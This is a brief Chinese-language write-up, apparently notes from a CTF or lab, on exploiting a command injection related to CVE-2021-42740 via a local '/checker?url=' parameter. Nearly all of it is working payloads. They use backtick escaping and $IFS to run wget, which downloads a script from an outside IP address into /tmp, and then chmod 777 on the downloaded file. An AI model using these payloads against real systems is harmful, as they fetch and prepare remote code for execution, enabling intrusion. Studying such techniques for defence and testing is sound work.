唉,我啊,太不自信了

CVE-2021-42740分析文章

`:`something``:#

变成:

`:\`something\``:\#
http://localhost:3333/checker?url=127.0.0.1:`:`wget$IFS\http://165.154.5.221/exp.sh$IFS\-O$IFS/tmp/s.sh``:`

然后chmod +x /tmp/s.sh

http://localhost:3333/checker?url=127.0.0.1:`:`chmod$IFS\777$IFS\/tmp/s.sh``:`

`:`something``:#

当成`

$IFS\

当成space